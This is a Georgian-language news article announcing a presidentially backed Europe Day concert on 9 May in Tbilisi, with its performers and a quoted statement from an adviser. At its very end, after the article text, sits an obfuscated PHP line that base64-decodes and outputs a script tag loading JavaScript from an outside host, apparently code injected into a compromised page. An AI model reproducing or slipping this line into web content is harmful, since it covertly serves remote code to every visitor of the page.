celsiusi
ავერსი შნაიდერი

ევროპის დღესთან დაკავშირებით 9 მაისს, 21:00 საათზე ორბელიანების სასახლის წინ, ათონელის ქუჩაზე კონცერტი „ევროპისთვის“ გაიმართება. ღონისძიება საქართველოს პრეზიდენტის ინიციატივითა და პრეზიდენტის ადმინისტრაციის მხარდაჭერით ჩატარდება.

კონცერტის სამზადისი უკვე მიმდინარეობს. ეწყობა სცენა.

კონცერტში მონაწილეობას მიიღებენ: ქართული ნაციონალური ბალეტი „სუხიშვილები“, ზურა რამიშვილის ჯაზკვარტეტი და მუსიკოსები: გიორგი გიგაშვილი, ნინი ნუცუბიძე, ლიზა კერესელიძე, კატო კვარაცხელია, სალიო, ნიკალა ზუბიაშვილი, დათა მუნჯიშვილი.

„9 მაისი არის ევროკავშირის დაბადების დღე. 1951 წლიდან აღინიშნება ეს თარიღი. 30 წელია, საქართველოსა და ევროკავშირს შორის ურთიერთობა არსებობს და ის ემსახურება თავისუფლებას, დემოკრატიას, ადამიანის უფლებებს, საერთო ღირებულებებს. ჩვენი ქვეყნისთვის ევროინტეგრაცია ძალიან აქტუალური პროცესია და ამ აქცენტით აღვნიშნავთ ამ თარიღს. პრეზიდენტის ინიციატივით, ამ დღესთან დაკავშირებით ათონელის ქუჩაზე გაიმართება კონცერტი. 21:00 საათზე. ყველასთვის არის ეს კონცერტი, მაგრამ ძირითადი სამიზნე ახალგაზრდები არიან, რომლებისთვისაც ევროპული ღირებულებები ახლობელი და გასაგებია. კონცერტს გახსნის სუხიშვილების ანსამბლი, 40-წუთიანი პროგრამით. სხვადასხვა ქვეყნიდან გვექნება იქ მოღვაწე ქართველების ჩართვები. ველით ყველას, სიცივე ნუ შეგაშინებთ, წვიმა – მით უმეტეს, ამისთვის მზად ვართ. გელით, ერთად შევხვდეთ ევროპის დღეს“, – განაცხადა ოფიციალური ღონისძიებების ორგანიზების საკითხებში პრეზიდენტის მრჩეველმა, ირინე შენგელიამ. 

273
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");